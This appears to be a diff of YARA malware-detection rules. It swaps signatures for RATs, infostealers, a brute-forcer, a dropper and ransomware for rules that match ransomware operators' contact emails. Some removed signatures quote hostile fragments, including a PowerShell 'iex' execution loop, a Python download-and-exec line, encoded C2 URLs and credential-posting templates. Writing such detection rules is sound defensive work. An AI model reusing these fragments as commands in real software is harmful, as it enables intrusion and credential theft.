-		logic_hash = "a40cf09dbaafb2e7b9130af1b40e46b4c38fed6185b16435ad4c118f9e6d56c7"
+		logic_hash = "cf9e163d2315d465afb47bf83f30d5d27e14c4cbbc1c235dcb15b75fb509ba7d"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" fullword wide
-		$s2 = "system volume information|" fullword wide
-		$s3 = "program files (x86)|" fullword wide
-		$s4 = "program files|" fullword wide
-		$s5 = "<SAVE_AUTO<|" fullword wide
-		$s6 = "add_up_files" fullword ascii
-		$s7 = "see_folders" ascii
-		$s8 = "see_files" ascii
-		$s9 = "see_scren" ascii
-		$s10 = "see_recording" ascii
-		$s11 = "see_responce" ascii
-		$s12 = "pull_data" ascii
-		$s13 = "do_process" ascii
-		$s14 = "do_updated" ascii
-		$s15 = "IPSConfig" fullword ascii
-		$s16 = "#Runing|ver#" wide
-		$s17 = "|fileslog=" wide
+		$s1 = "helprecover@foxmail.com" ascii wide nocase
+		$s2 = "recoverhelp2020@thesecure.biz" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Actionrat : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Epsilon
 {
 	meta:
-		description = "Detects ActionRAT, CSharp and Delfi variants"
-		author = "ditekSHen"
-		id = "ceb4bd65-85c0-5614-a7cb-8f3f2f849eae"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Epsilon ransomware"
+		author = "ditekShen"
+		id = "acdeb3b1-872b-5892-9dfe-2e506f767da2"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6922-L6955"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L163-L171"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1552cda3f02c08582e3dd97df98416635a25005081627097df181bfc6aac4665"
+		logic_hash = "163694ed2ae181764fc6e62027487d183114be35a689dd44d4d9761149df244b"
 		score = 75
-		quality = 46
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$x1 = /<action>(connect|command|drives|getfiles|upload|execute|download)<action>/ fullword wide
-		$x2 = "aHR0cDovLzE0NC45MS42NS4xMDAv" wide
-		$x3 = "aHR0cDovL21mYWhvc3QuZGRucy5uZXQv" wide
-		$f1 = "<updateCommand>b__" ascii
-		$f2 = "<getDrives>b__" ascii
-		$f3 = "<getStatus>b__" ascii
-		$f4 = "<getDirectories>b__" ascii
-		$f5 = "<updateUpload>b__" ascii
-		$f6 = "<infinity>b__" ascii
-		$f7 = "<uploadFile>b__" ascii
-		$s1 = "beaconURL" ascii
-		$s2 = "PingReply" ascii
-		$s3 = "updateUpload" ascii
-		$s4 = "updateCommand" ascii
-		$s5 = "runCommand" ascii
-		$s6 = "uploadFile" ascii
-		$s7 = "SELECT * FROM MSFT_NetAdapter WHERE ConnectorPresent = True AND DeviceID = '{0}'" fullword wide
-		$s8 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
-		$s9 = "Mozilla/3.0" fullword wide
-		$s10 = "|directory|N/A|" fullword wide
-		$s11 = "cmd.exe /c" fullword wide
-		$c1 = /Content-Disposition: form-data; name=(hostname|hid|id|action|secondary)/ fullword wide
-		$c2 = /(classification|updatecs|update|beacon)\.php/ wide
-		$c3 = "Content-Disposition: form-data;name=\"{0}\";filename=\"{1}\"filepath=\"{2}\"" fullword wide
-		$pdb1 = "D:\\Projects\\C#\\HTTP-Simple\\WindowsMediaPlayer - HTTP - " ascii
-		$pdb2 = "\\WindowsMediaPlayer10\\obj\\x86\\Release\\winow4.pdb" ascii
+		$s1 = "neftet@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( #x1 > 5 or ( all of ( $f* ) and ( 1 of ( $s* ) or 2 of ( $c* ) ) ) or 7 of ( $s* ) or all of ( $c* ) or ( all of ( $pdb* ) and 4 of them ) or ( 2 of ( $x* ) and 5 of them ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Nodachi : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Thanos
 {
 	meta:
-		description = "Detects Nodachi infostealer"
-		author = "ditekSHen"
-		id = "bce0c44d-7e75-5c51-ba93-75bd81896921"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Thanos ransomware"
+		author = "ditekShen"
+		id = "22ffb4c9-f113-5d3e-a466-6c384c0c6e8a"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6957-L6972"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L173-L182"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c8a262b862a47d5c0c9bd76b722aa4ceb55dd365b5dca35a61318d8a1c53269d"
+		logic_hash = "039ea384136a1aaa261702ed75ab9358aaa1ec2d5a8d35fe4789647f39490c7c"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$x1 = "//AppData//Roaming//kavachdb//kavach.db" ascii
-		$s1 = "/upload/drive/v3/files/{fileId}" ascii
-		$s2 = "main.getTokenFromWeb" ascii
-		$s3 = "main.tokenFromFile" ascii
-		$s4 = "/goLazagne/" ascii
-		$s5 = "/extractor/withoutdrive/main.go" ascii
-		$s6 = "struct { Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
-		$s7 = "C://Users//public//cred.json" ascii
+		$s1 = "my-contact-email@protonmail.com" ascii wide nocase
+		$s2 = "get-my-data@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofhearts : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Vovalex
 {
 	meta:
-		description = "IAmTheKing Queen Of Hearts payload"
-		author = "ditekSHen"
-		id = "b8d222f0-b3ce-5143-816b-4bbcde645672"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Vovalex ransomware"
+		author = "ditekShen"
+		id = "95e9ddce-8a19-59f1-baf4-bdac61c9c396"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6974-L6991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L184-L192"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0aafeb1dce380ebe6cccc3c7f9564022e1a4cdcf20091943d2bfcc845129152d"
+		logic_hash = "0e8b426e55c1efaf59e5f255f1da9cdfbb509561d3f7ea5baa2815c3131866eb"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "{'session':[{'name':'" ascii
-		$s2 = "begin mainthread ok" wide
-		$s3 = "getcommand error" wide
-		$s4 = "querycode error" wide
-		$s5 = "Code = %d" wide
-		$s6 = "cookie size :%d" wide
-		$s7 = "send request error:%d" wide
-		$s8 = "PmMytex%d" wide
-		$s9 = "%s_%c%c%c%c_%d" wide
-		$s10 = "?what@exception@std@@UBEPBDXZ" ascii
+		$s1 = "vovanandlexus@cock.li" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofclubs : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alumnilocker
 {
 	meta:
-		description = "IAmTheKing Queen Of Clubs payload"
-		author = "ditekSHen"
-		id = "4d19a484-0483-5b3e-a9ad-1cd8ca263a04"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with AlumniLocker ransomware"
+		author = "ditekShen"
+		id = "64b6aff8-3758-5837-b814-e2505a9c12a3"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6993-L7007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L194-L202"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "28d7d3e9a3b7c104fc5b0fa38ce33b34596f16f6987c34a0e2e3fd93a8a908bd"
+		logic_hash = "aeab9cb2b2da246e1863cd1102d901d322017d0b309e852d83e4f66f6e4bdd22"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "Not Support!" fullword wide
-		$s2 = "%s|%s|%s|%s" fullword wide
-		$s3 = "cmd.exe" fullword wide
-		$s4 = "for(;;){$S=Get-Content \"%s\";IF($S){\"\" > \"%s\";$t=iex $S 2>\"%s\";$t=$t+' ';echo $t >>\"%s\";}sleep -m " wide
-		$s5 = "PowerShell.exe -nop -c %s" fullword wide
-		$s6 = "%s \"%s\" Df" fullword wide
-		$s7 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" fullword ascii
+		$s1 = "alumnilocker@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Iamtheking : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Doejocrypt
 {
 	meta:
-		description = "IAmTheKing payload"
-		author = "ditekSHen"
-		id = "cf0d7c8d-0ac3-542d-b42e-f215af36044b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with DoejoCrypt ransomware"
+		author = "ditekShen"
+		id = "bdf67fd3-8614-52f0-8804-9905f067a848"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7009-L7029"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L204-L213"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1cc2aa9b672b8519a3e8a22e31403fb7adace0d430f9cab160e9a7d52e56e875"
+		logic_hash = "b76996ef413d017fa571115f7331154c808fed0f1b1e0c97241cadbbef260a00"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "DeleteFile \"%s\" Failed,Err=%d" wide
-		$s2 = "DeleteFile \"%s\" Success" wide
-		$s3 = "ExcuteFile \"%s\" Failed,Err=%d" wide
-		$s4 = "ExcuteFile \"%s\" Success" wide
-		$s5 = "CreateDownLoadFile \"%s\" Failed,Error=%d" wide
-		$s6 = "uploadFile \"%s\" Failed,errorcode=%d" wide
-		$s7 = "CreateUpLoadFile \"%s\" Success" wide
-		$s8 = "im the king" ascii
-		$s9 = "dont disturb me" fullword ascii
-		$s10 = "kill me or love me" fullword ascii
-		$s11 = "please leave me alone" fullword ascii
-		$s12 = "calculate the NO." fullword ascii
-		$s13 = "\\1-driver-vmsrvc" fullword ascii
+		$s1 = "konedieyp@airmail.cc" ascii wide nocase
+		$s2 = "uenwonken@memail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Gobrut : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Purge
 {
 	meta:
-		description = "Detects unknown Go multi-bruteforcer bot (StealthWorker / GoBrut) against multiple systems: QNAP, MagOcart, WordPress, Opencart, Bitrix, Postgers, MySQL, Drupal, Joomla, SSH, FTP, Magneto, CPanel"
-		author = "ditekSHen"
-		id = "f5605123-12d9-55d1-8a32-acebf16834f8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Purge ransomware"
+		author = "ditekShen"
+		id = "2a0f2c69-b179-5e48-9db6-be25e329f72b"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7031-L7086"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L215-L224"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb93d0dcf7f38294444ac6d2e1a7a126027ce07f0305af9ae0f8aa8f4b806c5c"
+		logic_hash = "49f3f5a88212d4bed1f0237a4437fb537e84cd6dd26c5fe224250f3b6e39d384"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$x1 = "/src/StealthWorker/Worker" ascii
-		$x2 = "/go/src/Cloud_Checker/" ascii
-		$x3 = "brutXmlRpc" ascii
-		$s1 = "main.WPBrut" ascii
-		$s2 = "main.WPChecker" ascii
-		$s3 = "main.WooChecker" ascii
-		$s4 = "main.StandartBrut" ascii
-		$s5 = "main.StandartBackup" ascii
-		$s6 = "main.WpMagOcartType" ascii
-		$s7 = "main.StandartAdminFinder" ascii
-		$w1 = "/WorkerQnap_brut/main.go" ascii
-		$w2 = "/WorkerHtpasswd_brut/main.go" ascii
-		$w3 = "/WorkerOpencart_brut/main.go" ascii
-		$w4 = "/WorkerBitrix_brut/main.go" ascii
-		$w5 = "/WorkerPostgres_brut/main.go" ascii
-		$w6 = "/WorkerMysql_brut/main.go" ascii
-		$w7 = "/WorkerFTP_brut/main.go" ascii
-		$w8 = "/WorkerSSH_brut/main.go" ascii
-		$w9 = "/WorkerDrupal_brut/main.go" ascii
-		$w10 = "/WorkerJoomla_brut/main.go" ascii
-		$w11 = "/WorkerMagento_brut/main.go" ascii
-		$w12 = "/WorkerWHM_brut/main.go" ascii
-		$w13 = "/WorkerCpanel_brut/main.go" ascii
-		$w14 = "/WorkerPMA_brut/main.go" ascii
-		$w15 = "/WorkerWP_brut/main.go" ascii
-		$p1 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=cpanel" ascii
-		$p2 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=ftpBrut" ascii
-		$p3 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=mysql_b" ascii
-		$p4 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=qnapBrt" ascii
-		$p5 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=OCartBrt" ascii
-		$p6 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=phpadmin" ascii
-		$p7 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=bitrixBrt" ascii
-		$p8 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=drupalBrt" ascii
-		$p9 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=joomlaBrt" ascii
-		$p10 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=htpasswdBrt" ascii
-		$p11 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=magentoBrt" ascii
-		$p12 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=postgres_b" ascii
-		$p13 = "AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=%s&USER_PASSWORD=%s&Login=&captcha_sid=&captcha_word=" ascii
-		$p14 = "%qlog=%s&pwd=%s&wp-submit=Log In&redirect_to=%s/wp-admin/&testcookie=1" ascii
-		$p15 = "name=%s&pass=%s&form_build_id=%s&form_id=user_login_form&op=Log" ascii
-		$p16 = "username=%s&passwd=%s&option=com_login&task=login&return=%s&%s=1" ascii
-		$v1_1 = "brutC" fullword ascii
-		$v1_2 = "XmlRpc" fullword ascii
-		$v1_3 = "shouldRetry$" ascii
-		$v1_4 = "HttpC|%" ascii
-		$v1_5 = "ftpH%_" ascii
-		$v1_6 = "ssh%po" ascii
-		$v1_7 = "?sevlyar/4-da" ascii
+		$s1 = "rscl@dr.com" ascii wide nocase
+		$s2 = "rscl@usa.com" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 2 of ( $x* ) and 3 of ( $s* ) ) or all of ( $s* ) or 6 of ( $w* ) or 6 of ( $p* ) or 6 of ( $v1* ) or 12 of them )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Biopass_Dropper : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeoticus
 {
 	meta:
-		description = "Detects Go BioPass dropper"
-		author = "ditekSHen"
-		id = "56037c79-59f7-587c-8f54-c9618e871f34"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Zeoticus ransomware"
+		author = "ditekShen"
+		id = "4d5f0d6d-f792-563d-9a9b-1986f5af8743"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7088-L7111"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L226-L235"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "06f3b3ee38349ddcf9be7cbb7627d60fa673962409dde6e4badd112841a3ed19"
+		logic_hash = "7a83b15b0c8e81f67d11f8b5d9a43ba4e1e3a0f6741ddd0daafe4e742dd91cd8"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "main.NetWorkStatus" ascii
-		$s2 = "main.NoErrorRunFunction" ascii
-		$s3 = "main.FileExist" ascii
-		$s4 = "main.execute" ascii
-		$s5 = "main.PsGenerator" ascii
-		$s6 = "main.downFile" ascii
-		$s7 = "main.Unzip" ascii
-		$url1 = "https://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/" ascii
-		$x1 = "SCHTASKS /Run /TN SYSTEM_CDAEMON" ascii
-		$x2 = "SCHTASKS /Run /TN SYSTEM_SETTINGS" ascii
-		$x3 = "SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST" ascii
-		$x4 = ".exe /install /quiet /norestart" ascii
-		$x5 = "exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\\''http" ascii
-		$x6 = "powershell.exe -Command $" ascii
-		$x7 = ".Path ='-----BEGIN RSA TESTING KEY-----" ascii
+		$s1 = "anobtanium@tutanota.com" ascii wide nocase
+		$s2 = "anobtanium@cock.li" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $x* ) or ( 1 of ( $url* ) and ( $go ) ) or 9 of them )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_A310Logger : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Jobcryptor
 {
 	meta:
-		description = "Detects A310Logger"
-		author = "ditekSHen"
-		id = "d2cf2f7b-5710-56ab-b13d-97a70fe7f618"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with JobCryptor ransomware"
+		author = "ditekShen"
+		id = "406f5638-883b-57a4-a2ba-532d2bd3ae83"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7113-L7149"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L237-L247"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8205169c9c78eb784b9d07a5fd85ad3a54763452e1e315f7e7911b8ac49a6c01"
+		logic_hash = "c8c5dcc0d7484a3ac6e702cca8bd0907f9e4f4aea5e99c4c3f988389e0d803a7"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		snort_sid = "920204-920207"
+		quality = 69
+		tags = ""
 
 	strings:
-		$s1 = "Temporary Directory * for" fullword wide
-		$s2 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
-		$s3 = "@ENTIFIER=" wide
-		$s4 = "ExecQuery" fullword wide
-		$s5 = "MSXML2.ServerXMLHTTP.6.0" fullword wide
-		$s6 = "Content-Disposition: form-data; name=\"document\"; filename=\"" wide
-		$s7 = "CopyHere" fullword wide
-		$s8 = "] Error in" fullword wide
-		$s9 = "shell.application" fullword wide nocase
-		$s10 = "SetRequestHeader" fullword wide
-		$s11 = "\\Ethereum\\keystore" fullword wide
-		$s12 = "@TITLE Removing" fullword wide
-		$s13 = "@RD /S /Q \"" fullword wide
-		$en1 = "Unsupported encryption" fullword wide
-		$en2 = "BCryptOpenAlgorithmProvider(SHA1)" fullword wide
-		$en3 = "BCryptGetProperty(ObjectLength)" fullword wide
-		$en4 = "BCryptGetProperty(HashDigestLength)" fullword wide
-		$v1_1 = "PW\\FILES\\SC::" wide
-		$v1_2 = "AddAttachment" fullword wide
-		$v1_3 = "Started:" fullword wide
-		$v1_4 = "Ended:" fullword wide
-		$v1_5 = "sharedSecret" fullword wide
-		$v1_6 = "\":\"([^\"]+)\"" fullword wide
-		$v1_7 = "\\credentials.txt" fullword wide
-		$v1_8 = "WritePasswords" fullword ascii
-		$v1_9 = "sGeckoBrowserPaths" fullword ascii
-		$v1_10 = "get_sPassword" fullword ascii
+		$s1 = "olaggoune235@protonmail.ch" ascii wide nocase
+		$s2 = "ouardia11@tutanota.com" ascii wide nocase
+		$s3 = "laggouneo11@gmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $en* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $en* ) ) or 5 of ( $v1* ) or ( 4 of ( $v1* ) and 2 of ( $s* ) and 2 of ( $en* ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Crylock : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cuba
 {
 	meta:
-		description = "Detects CryLock ransomware"
-		author = "ditekSHen"
-		id = "296288d8-2fdd-592a-aef9-7d4853885594"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with JobCryptor ransomware"
+		author = "ditekShen"
+		id = "5eea027d-2164-54f2-a2bf-74b5d532e610"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7151-L7186"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L249-L261"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dde35dd2c7e89212c4562f2dcf6a78d06fbb3d31150d49e6c48f758b07f1834f"
+		logic_hash = "b734199c8593c338c803518b2729e9d9ceaaed5d21585a3d299885433d8f796e"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 65
+		tags = ""
 
 	strings:
-		$s1 = "Encrypted by BlackRabbit. (BR-" ascii
-		$s2 = "{ENCRYPTENDED}" ascii
-		$s3 = "{ENCRYPTSTART}" ascii
-		$s4 = "<%UNDECRYPT_DATETIME%>" ascii
-		$s5 = "<%RESERVE_CONTACT%>" ascii
-		$s6 = "how_to_decrypt.hta" ascii wide
-		$s7 = "END ENCRYPT ONLY EXTENATIONS" ascii
-		$s8 = "END UNENCRYPT EXTENATIONS" ascii
-		$s9 = "END COMMANDS LIST" ascii
-		$s10 = "END PROCESSES KILL LIST" ascii
-		$s11 = "END SERVICES STOP LIST" ascii
-		$s12 = "END PROCESSES WHITE LIST" ascii
-		$s13 = "END UNENCRYPT FILES LIST" ascii
-		$s14 = "END UNENCRYPT FOLDERS LIST" ascii
-		$s15 = "Encrypted files:" ascii
-		$s16 = { 65 78 74 65 6e 61 74 69 6f 6e 73 00 ff ff ff ff
-                 06 00 00 00 63 6f 6e 66 69 67 00 00 ff ff ff ff
-                 (0a|0d 0a) 00 00 00 63 6f 6e 66 69 67 2e 74 78
-                 74 00 00 ff ff ff ff 03 00 00 00 68 74 61 }
-		$p1 = "-exclude" fullword
-		$p2 = "-makeff" fullword
-		$p3 = "-full" fullword
-		$p4 = "-nolocal" fullword
-		$p5 = "-nolan" fullword
-		$p6 = "\" -id \"" fullword
-		$p7 = "\" -wid \"" fullword
-		$p8 = "\"runas\"" fullword
-		$p9 = " -f -s -t 00" fullword ascii
+		$s1 = "helpadmin2@protonmail.com" ascii wide nocase
+		$s2 = "helpadmin2@cock.li" ascii wide nocase
+		$s3 = "mfra@cock.li" ascii wide nocase
+		$s4 = "admin@cuba-supp.com" ascii wide nocase
+		$s5 = "cuba_support@exploit.im" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 6 of ( $p* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Deeprats : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Hello
 {
 	meta:
-		description = "Detects DeepRats ("
-		author = "ditekSHen"
-		id = "5b774e24-3864-519f-9cfd-d729d7d567a0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Hello / WickrMe ransomware"
+		author = "ditekShen"
+		id = "02bbaa61-7ea3-5edd-8b38-27ef1f6ee1e2"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7188-L7218"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L263-L277"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "511264c0b6932f90069a5206cd142ca7210b0bc40c51ef5aa9c41a161fb57aab"
+		logic_hash = "dfafb0323a50891c03c4b706d4f3a6a511cecdee2448c1f554b416ba1e3d3df9"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		hash1 = "1f8b7e1b14869d119c5de1f05330094899bd997fca4c322d852db85cbd9271e6"
+		quality = 61
+		tags = ""
 
 	strings:
-		$s1 = "https://freegeoip.live/json/https://myexternalip.com/rawin" ascii
-		$s2 = "github.com/cretz/bine" ascii
-		$s3 = "github.com/kbinani/screenshot" ascii
-		$s4 = "socks5://%s:%d" ascii
-		$s5 = "socks5://%s:%s@%s:%d" ascii
-		$s6 = "http://%s:%d" ascii
-		$s7 = "http://%s@%s:%d" ascii
-		$s8 = "%SystemRoot%\\system32\\--CookieAuthentication" ascii
-		$s9 = "tor_addr_" ascii
-		$f1 = ".GetVnc" ascii
-		$f2 = ".GetCommand" ascii
-		$f3 = ".GetPayload" ascii
-		$f4 = ".ListenCommands" ascii
-		$f5 = ".ReceiveFile" ascii
-		$f6 = ".RegisterImplant" ascii
-		$f7 = ".Screenshot" ascii
-		$f8 = ".SendFile" ascii
-		$f9 = ".StartShell" ascii
-		$f10 = ".UnregisterImplant" ascii
-		$f11 = ".VncInstalled" ascii
-		$f12 = ".PingPong" ascii
-		$f13 = ".ListenCMD" ascii
+		$s1 = "emming@tutanota.com" ascii wide nocase
+		$s2 = "ampbel@protonmail.com" ascii wide nocase
+		$s3 = "asauribe@tutanota.com" ascii wide nocase
+		$s4 = "candietodd@tutanota.com" ascii wide nocase
+		$s5 = "kellyreiff@tutanota.com" ascii wide nocase
+		$s6 = "kevindeloach@protonmail.com" ascii wide nocase
+		$s7 = "sheilabeasley@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 8 of ( $f* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Gasket : FILE
